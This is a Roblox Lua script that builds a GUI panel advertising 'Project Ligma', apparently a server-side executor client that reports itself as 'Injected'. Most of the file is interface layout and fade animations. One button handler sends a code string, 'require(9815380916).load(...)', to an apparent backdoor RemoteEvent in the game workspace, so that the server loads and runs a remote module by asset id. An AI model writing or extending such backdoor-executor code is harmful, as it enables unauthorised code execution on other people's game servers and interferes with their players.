if not game.Players.LocalPlayer.PlayerGui:FindFirstChild("hi") then
local Converted = {
	["_hi"] = Instance.new("ScreenGui");
	["_LocalScript"] = Instance.new("LocalScript");
	["_ImageLabel"] = Instance.new("ImageButton");
	["_LocalScript1"] = Instance.new("LocalScript");
	["_thingy"] = Instance.new("Frame");
	["_TextLabel1"] = Instance.new("TextLabel");
	["_TextLabel2"] = Instance.new("TextLabel");
	["_TextLabel3"] = Instance.new("TextLabel");
	["_status"] = Instance.new("TextLabel");
	["_Script"] = Instance.new("Script");
	["_R15TOR6"] = Instance.new("TextButton");
	["_R6"] = Instance.new("ModuleScript");
	["_DefaultCharacter"] = Instance.new("Model");
	["_Head"] = Instance.new("Part");
	["_Climbing"] = Instance.new("Sound");
	["_CharacterSoundEvent"] = Instance.new("RemoteEvent");
	["_Swimming"] = Instance.new("Sound");
	["_CharacterSoundEvent1"] = Instance.new("RemoteEvent");
	["_Running"] = Instance.new("Sound");
	["_CharacterSoundEvent2"] = Instance.new("RemoteEvent");
	["_Splash"] = Instance.new("Sound");
	["_CharacterSoundEvent3"] = Instance.new("RemoteEvent");
	["_Landing"] = Instance.new("Sound");
	["_CharacterSoundEvent4"] = Instance.new("RemoteEvent");
	["_Jumping"] = Instance.new("Sound");
	["_CharacterSoundEvent5"] = Instance.new("RemoteEvent");
	["_FreeFalling"] = Instance.new("Sound");
	["_CharacterSoundEvent6"] = Instance.new("RemoteEvent");
	["_Died"] = Instance.new("Sound");
	["_CharacterSoundEvent7"] = Instance.new("RemoteEvent");
	["_GettingUp"] = Instance.new("Sound");
	["_CharacterSoundEvent8"] = Instance.new("RemoteEvent");
	["_Climbing1"] = Instance.new("Sound");
	["_CharacterSoundEvent9"] = Instance.new("RemoteEvent");
	["_Swimming1"] = Instance.new("Sound");
	["_CharacterSoundEvent10"] = Instance.new("RemoteEvent");
	["_Running1"] = Instance.new("Sound");
	["_CharacterSoundEvent11"] = Instance.new("RemoteEvent");
	["_Splash1"] = Instance.new("Sound");
	["_CharacterSoundEvent12"] = Instance.new("RemoteEvent");
	["_Landing1"] = Instance.new("Sound");
	["_CharacterSoundEvent13"] = Instance.new("RemoteEvent");
	["_Jumping1"] = Instance.new("Sound");
	["_CharacterSoundEvent14"] = Instance.new("RemoteEvent");
	["_FreeFalling1"] = Instance.new("Sound");
	["_CharacterSoundEvent15"] = Instance.new("RemoteEvent");
	["_Died1"] = Instance.new("Sound");
	["_CharacterSoundEvent16"] = Instance.new("RemoteEvent");
	["_GettingUp1"] = Instance.new("Sound");
	["_CharacterSoundEvent17"] = Instance.new("RemoteEvent");
	["_CharacterSoundEvent18"] = Instance.new("RemoteEvent");
	["_Mesh"] = Instance.new("SpecialMesh");
	["_HairAttachment"] = Instance.new("Attachment");
	["_HatAttachment"] = Instance.new("Attachment");
	["_FaceFrontAttachment"] = Instance.new("Attachment");
	["_FaceCenterAttachment"] = Instance.new("Attachment");
	["_GettingUp2"] = Instance.new("Sound");
	["_CharacterSoundEvent19"] = Instance.new("RemoteEvent");
	["_Died2"] = Instance.new("Sound");
	["_CharacterSoundEvent20"] = Instance.new("RemoteEvent");
	["_FreeFalling2"] = Instance.new("Sound");
	["_CharacterSoundEvent21"] = Instance.new("RemoteEvent");
	["_Jumping2"] = Instance.new("Sound");
	["_CharacterSoundEvent22"] = Instance.new("RemoteEvent");
	["_Landing2"] = Instance.new("Sound");
	["_CharacterSoundEvent23"] = Instance.new("RemoteEvent");
	["_Splash2"] = Instance.new("Sound");
	["_CharacterSoundEvent24"] = Instance.new("RemoteEvent");
	["_Running2"] = Instance.new("Sound");
	["_CharacterSoundEvent25"] = Instance.new("RemoteEvent");
	["_Swimming2"] = Instance.new("Sound");
	["_CharacterSoundEvent26"] = Instance.new("RemoteEvent");
	["_Climbing2"] = Instance.new("Sound");
	["_CharacterSoundEvent27"] = Instance.new("RemoteEvent");
	["_face"] = Instance.new("Decal");
	["_Torso"] = Instance.new("Part");
	["_CharacterSoundEvent28"] = Instance.new("RemoteEvent");
	["_roblox"] = Instance.new("Decal");
	["_NeckAttachment"] = Instance.new("Attachment");
	["_BodyFrontAttachment"] = Instance.new("Attachment");
	["_BodyBackAttachment"] = Instance.new("Attachment");
	["_LeftCollarAttachment"] = Instance.new("Attachment");
	["_RightCollarAttachment"] = Instance.new("Attachment");
	["_WaistFrontAttachment"] = Instance.new("Attachment");
	["_WaistCenterAttachment"] = Instance.new("Attachment");
	["_WaistBackAttachment"] = Instance.new("Attachment");
	["_Right Shoulder"] = Instance.new("Motor6D");
	["_Left Shoulder"] = Instance.new("Motor6D");
	["_Right Hip"] = Instance.new("Motor6D");
	["_Left Hip"] = Instance.new("Motor6D");
	["_Neck"] = Instance.new("Motor6D");
	["_Left Arm"] = Instance.new("Part");
	["_CharacterSoundEvent29"] = Instance.new("RemoteEvent");
	["_LeftShoulderAttachment"] = Instance.new("Attachment");
	["_LeftGripAttachment"] = Instance.new("Attachment");
	["_Right Arm"] = Instance.new("Part");
	["_CharacterSoundEvent30"] = Instance.new("RemoteEvent");
	["_RightShoulderAttachment"] = Instance.new("Attachment");
	["_RightGripAttachment"] = Instance.new("Attachment");
	["_Left Leg"] = Instance.new("Part");
	["_CharacterSoundEvent31"] = Instance.new("RemoteEvent");
	["_LeftFootAttachment"] = Instance.new("Attachment");
	["_Right Leg"] = Instance.new("Part");
	["_CharacterSoundEvent32"] = Instance.new("RemoteEvent");
	["_RightFootAttachment"] = Instance.new("Attachment");
	["_Humanoid"] = Instance.new("Humanoid");
	["_Animator"] = Instance.new("Animator");
	["_Respawn"] = Instance.new("Script");
	["_Jump"] = Instance.new("LocalScript");
	["_HumanoidRootPart"] = Instance.new("Part");
	["_CharacterSoundEvent33"] = Instance.new("RemoteEvent");
	["_RootAttachment"] = Instance.new("Attachment");
	["_RootJoint"] = Instance.new("Motor6D");
	["_Sound"] = Instance.new("Script");
	["_LocalSound"] = Instance.new("LocalScript");
	["_Health"] = Instance.new("Script");
	["_Animate"] = Instance.new("LocalScript");
	["_idle"] = Instance.new("StringValue");
	["_Animation1"] = Instance.new("Animation");
	["_Weight"] = Instance.new("NumberValue");
	["_Animation2"] = Instance.new("Animation");
	["_Weight1"] = Instance.new("NumberValue");
	["_walk"] = Instance.new("StringValue");
	["_WalkAnim"] = Instance.new("Animation");
	["_run"] = Instance.new("StringValue");
	["_RunAnim"] = Instance.new("Animation");
	["_jump"] = Instance.new("StringValue");
	["_JumpAnim"] = Instance.new("Animation");
	["_climb"] = Instance.new("StringValue");
	["_ClimbAnim"] = Instance.new("Animation");
	["_toolnone"] = Instance.new("StringValue");
	["_ToolNoneAnim"] = Instance.new("Animation");
	["_fall"] = Instance.new("StringValue");
	["_FallAnim"] = Instance.new("Animation");
	["_sit"] = Instance.new("StringValue");
	["_SitAnim"] = Instance.new("Animation");
	["_ScaleDampeningPercent"] = Instance.new("NumberValue");
	["_LocalScript2"] = Instance.new("LocalScript");
	["_RemoteEvent"] = Instance.new("RemoteEvent");
	["_Script1"] = Instance.new("Script");
}

-- Properties:

Converted["_hi"].ResetOnSpawn = false
Converted["_hi"].ZIndexBehavior = Enum.ZIndexBehavior.Sibling
Converted["_hi"].Name = "hi"
Converted["_hi"].Parent = game.Players.LocalPlayer.PlayerGui

Converted["_ImageLabel"].Image = "http://www.roblox.com/asset/?id=87162794"
Converted["_ImageLabel"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_ImageLabel"].BackgroundTransparency = 1
Converted["_ImageLabel"].BorderColor3 = Color3.fromRGB(27.000002190470695, 42.000001296401024, 53.000004440546036)
Converted["_ImageLabel"].Position = UDim2.new(-0.0710000023, 0, 0.43599999, 0)
Converted["_ImageLabel"].Size = UDim2.new(0, 99, 0, 100)
Converted["_ImageLabel"].Name = "ImageLabel"
Converted["_ImageLabel"].Parent = Converted["_hi"]

Converted["_thingy"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_thingy"].BackgroundTransparency = 1
Converted["_thingy"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_thingy"].Position = UDim2.new(0.0859375, 0, 0.793192863, 0)
Converted["_thingy"].Size = UDim2.new(0, 306, 0, 100)
Converted["_thingy"].Name = "thingy"
Converted["_thingy"].Parent = Converted["_hi"]

Converted["_TextLabel1"].Font = Enum.Font.SourceSansBold
Converted["_TextLabel1"].Text = "Project Ligma by Harkinian and Unverified"
Converted["_TextLabel1"].TextColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextLabel1"].TextScaled = true
Converted["_TextLabel1"].TextSize = 13
Converted["_TextLabel1"].TextTransparency = 1
Converted["_TextLabel1"].TextWrapped = true
Converted["_TextLabel1"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextLabel1"].BackgroundTransparency = 1
Converted["_TextLabel1"].BorderColor3 = Color3.fromRGB(27.000002190470695, 42.000001296401024, 53.000004440546036)
Converted["_TextLabel1"].Size = UDim2.new(0, 306, 0, 18)
Converted["_TextLabel1"].Name = "TextLabel1"
Converted["_TextLabel1"].Parent = Converted["_thingy"]

Converted["_TextLabel2"].Font = Enum.Font.SourceSansBold
Converted["_TextLabel2"].Text = "Use the external program to execute scripts."
Converted["_TextLabel2"].TextColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextLabel2"].TextSize = 17
Converted["_TextLabel2"].TextTransparency = 1
Converted["_TextLabel2"].TextWrapped = true
Converted["_TextLabel2"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextLabel2"].BackgroundTransparency = 1
Converted["_TextLabel2"].BorderColor3 = Color3.fromRGB(27.000002190470695, 42.000001296401024, 53.000004440546036)
Converted["_TextLabel2"].Position = UDim2.new(0, 0, 0.530000031, 0)
Converted["_TextLabel2"].Size = UDim2.new(0, 306, 0, 23)
Converted["_TextLabel2"].Name = "TextLabel2"
Converted["_TextLabel2"].Parent = Converted["_thingy"]

Converted["_TextLabel3"].Font = Enum.Font.SourceSansBold
Converted["_TextLabel3"].Text = "Run scripts live without filthy modules or converting!"
Converted["_TextLabel3"].TextColor3 = Color3.fromRGB(0, 0, 0)
Converted["_TextLabel3"].TextSize = 16
Converted["_TextLabel3"].TextTransparency = 1
Converted["_TextLabel3"].TextWrapped = true
Converted["_TextLabel3"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_TextLabel3"].BackgroundTransparency = 1
Converted["_TextLabel3"].BorderColor3 = Color3.fromRGB(27.000002190470695, 42.000001296401024, 53.000004440546036)
Converted["_TextLabel3"].BorderSizePixel = 0
Converted["_TextLabel3"].Position = UDim2.new(0, 0, 0.180000007, 0)
Converted["_TextLabel3"].Size = UDim2.new(0, 306, 0, 35)
Converted["_TextLabel3"].Name = "TextLabel3"
Converted["_TextLabel3"].Parent = Converted["_thingy"]

Converted["_status"].Font = Enum.Font.SourceSansBold
Converted["_status"].Text = "Status: Injected"
Converted["_status"].TextColor3 = Color3.fromRGB(0, 0, 0)
Converted["_status"].TextSize = 18
Converted["_status"].TextTransparency = 1
Converted["_status"].TextWrapped = true
Converted["_status"].TextYAlignment = Enum.TextYAlignment.Bottom
Converted["_status"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_status"].BackgroundTransparency = 1
Converted["_status"].BorderColor3 = Color3.fromRGB(27.000002190470695, 42.000001296401024, 53.000004440546036)
Converted["_status"].Position = UDim2.new(0, 0, 0.829999983, 0)
Converted["_status"].Size = UDim2.new(0, 306, 0, 17)
Converted["_status"].Name = "status"
Converted["_status"].Parent = Converted["_thingy"]

Converted["_Script"].Parent = Converted["_status"]

Converted["_R15TOR6"].Font = Enum.Font.SourceSansBold
Converted["_R15TOR6"].Text = "R15 --> R6"
Converted["_R15TOR6"].TextColor3 = Color3.fromRGB(0, 0, 0)
Converted["_R15TOR6"].TextSize = 23
Converted["_R15TOR6"].BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Converted["_R15TOR6"].BorderColor3 = Color3.fromRGB(0, 0, 0)
Converted["_R15TOR6"].Position = UDim2.new(0.00800000131, 0, 0.729143023, 0)
Converted["_R15TOR6"].Size = UDim2.new(0, 98, 0, 44)
Converted["_R15TOR6"].Visible = false
Converted["_R15TOR6"].Name = "R15TOR6"
Converted["_R15TOR6"].Parent = Converted["_hi"]

-- Fake Module Scripts:

local fake_module_scripts = {}

do -- Fake Module: StarterGui.hi.R15TOR6.R6
	local script = Instance.new("ModuleScript")
	script.Name = "R6"
	script.Parent = Converted["_R15TOR6"]
	local function module_script()
		local R6Converter = {}
		function R6Converter.load(Plr)
			Plr = game.Players:WaitForChild(Plr)
			local FalseChar = script:WaitForChild("DefaultCharacter"):Clone()
			local PlayersCharacter = game.Players:GetCharacterAppearanceAsync(Plr.UserId):Clone()
			local FaceID = (Plr.Character:WaitForChild("Head"):FindFirstChild("face") or {Texture = "http://www.roblox.com/asset/?id=144080495"}).Texture
			local Accessories = {}
			FalseChar:WaitForChild("Head"):WaitForChild("face").Texture = FaceID
			FalseChar:SetPrimaryPartCFrame(Plr.Character:WaitForChild("HumanoidRootPart").CFrame)
			for _,Prt in pairs(PlayersCharacter:GetDescendants()) do
				if Prt:IsA("Accessory") or Prt:IsA("Hat") or Prt:IsA("BodyColors") or Prt:IsA("CharacterMesh")or Prt:IsA("Pants") or Prt:IsA("Shirt") or Prt:IsA("ShirtGraphic") or Prt:IsA("Tool") then
					table.insert(Accessories,Prt:Clone())
				end
			end

			for _,Prt in pairs(Plr.Character:GetChildren()) do
				Prt:Destroy()
			end
			for _,Prt in pairs(FalseChar:GetChildren()) do
				Prt.Parent = Plr.Character
			end
			for _,Prt in pairs(Accessories) do
				Prt.Parent = Plr.Character
			end


		end

		return R6Converter

	end
	fake_module_scripts[script] = module_script
end

-- Fake Local Scripts:

local function BWHY_fake_script() -- Fake Script: StarterGui.hi.LocalScript
	local script = Instance.new("LocalScript")
	script.Name = "LocalScript"
	script.Parent = Converted["_hi"]
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	local info = script.Parent.thingy
	local text1 = script.Parent.thingy.TextLabel1
	local text2 = script.Parent.thingy.TextLabel3
	local text3 = script.Parent.thingy.TextLabel2
	local text4 = script.Parent.thingy.status


	script.Parent.ImageLabel:TweenPosition(UDim2.new(0.461, 0,0.433, 0))
	wait(2)
	script.Parent.ImageLabel:TweenPosition(UDim2.new(0.008, 0,0.794, 0))
	wait(1)
	script.Parent.R15TOR6.Visible = true
	wait(0.7)
	script.Parent.thingy.BackgroundTransparency = 0.9
	wait(0.1)
	script.Parent.thingy.BackgroundTransparency = 0.8
	wait(0.1)
	script.Parent.thingy.BackgroundTransparency = 0.7
	wait(0.1)
	script.Parent.thingy.BackgroundTransparency = 0.6
	wait(0.1)
	script.Parent.thingy.BackgroundTransparency = 0.5
	wait(0.1)
	script.Parent.thingy.BackgroundTransparency = 0.4
	wait(0.1)
	script.Parent.thingy.BackgroundTransparency = 0.3
	wait(0.1)
	script.Parent.thingy.BackgroundTransparency = 0.2
	wait(0.1)
	script.Parent.thingy.BackgroundTransparency = 0.1
	wait(0.1)
	text1.TextTransparency = 0.9
	wait(0.1)
	text1.TextTransparency = 0.8
	wait(0.1)
	text1.TextTransparency = 0.7
	wait(0.1)
	text1.TextTransparency = 0.6
	wait(0.1)
	text1.TextTransparency = 0.5
	wait(0.1)
	text1.TextTransparency = 0.4
	wait(0.1)
	text1.TextTransparency = 0.3
	wait(0.1)
	text1.TextTransparency = 0.2
	wait(0.1)
	text1.TextTransparency = 0.1
	wait(0.1)
	text1.TextTransparency = 0
	--separe bro
	wait(0.1)
	text2.TextTransparency = 0.9
	wait(0.1)
	text2.TextTransparency = 0.8
	wait(0.1)
	text2.TextTransparency = 0.7
	wait(0.1)
	text2.TextTransparency = 0.6
	wait(0.1)
	text2.TextTransparency = 0.5
	wait(0.1)
	text2.TextTransparency = 0.4
	wait(0.1)
	text2.TextTransparency = 0.3
	wait(0.1)
	text2.TextTransparency = 0.2
	wait(0.1)
	text2.TextTransparency = 0.1
	wait(0.1)
	text2.TextTransparency = 0
	wait(0.1)
	--separe
	text3.TextTransparency = 0.9
	wait(0.1)
	text3.TextTransparency = 0.8
	wait(0.1)
	text3.TextTransparency = 0.7
	wait(0.1)
	text3.TextTransparency = 0.6
	wait(0.1)
	text3.TextTransparency = 0.5
	wait(0.1)
	text3.TextTransparency = 0.4
	wait(0.1)
	text3.TextTransparency = 0.3
	wait(0.1)
	text3.TextTransparency = 0.2
	wait(0.1)
	text3.TextTransparency = 0.1
	wait(0.1)
	text3.TextTransparency = 0
	wait(0.1)
	--separe
	text4.TextTransparency = 0.9
	wait(0.1)
	text4.TextTransparency = 0.8
	wait(0.1)
	text4.TextTransparency = 0.7
	wait(0.1)
	text4.TextTransparency = 0.6
	wait(0.1)
	text4.TextTransparency = 0.5
	wait(0.1)
	text4.TextTransparency = 0.4
	wait(0.1)
	text4.TextTransparency = 0.3
	wait(0.1)
	text4.TextTransparency = 0.2
	wait(0.1)
	text4.TextTransparency = 0.1
	wait(0.1)
	text4.TextTransparency = 0





end
local function KUCMUHP_fake_script() -- Fake Script: StarterGui.hi.ImageLabel.LocalScript
	local script = Instance.new("LocalScript")
	script.Name = "LocalScript"
	script.Parent = Converted["_ImageLabel"]
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		wait(0.1)
		script.Parent.Parent.changelog.Visible = true
		wait(0)
		script.Parent.Parent.changelog:TweenPosition(UDim2.new(0.283, 0,0.353, 0))
	end)
end
local function GZRYLP_fake_script() -- Fake Script: StarterGui.hi.R15TOR6.LocalScript
	local script = Instance.new("LocalScript")
	script.Name = "LocalScript"
	script.Parent = Converted["_R15TOR6"]
	local req = require
	local require = function(obj)
		local fake = fake_module_scripts[obj]
		if fake then
			return fake()
		end
		return req(obj)
	end

	script.Parent.MouseButton1Click:Connect(function()
		game.workspace.key11111111111111111111111.Remote:FireServer("require(9815380916).load(".."'"..game.Players.LocalPlayer.Name.."'"..")", "epick", "cruel")
	end)
end

coroutine.wrap(BWHY_fake_script)()
coroutine.wrap(KUCMUHP_fake_script)()
coroutine.wrap(GZRYLP_fake_script)()
end
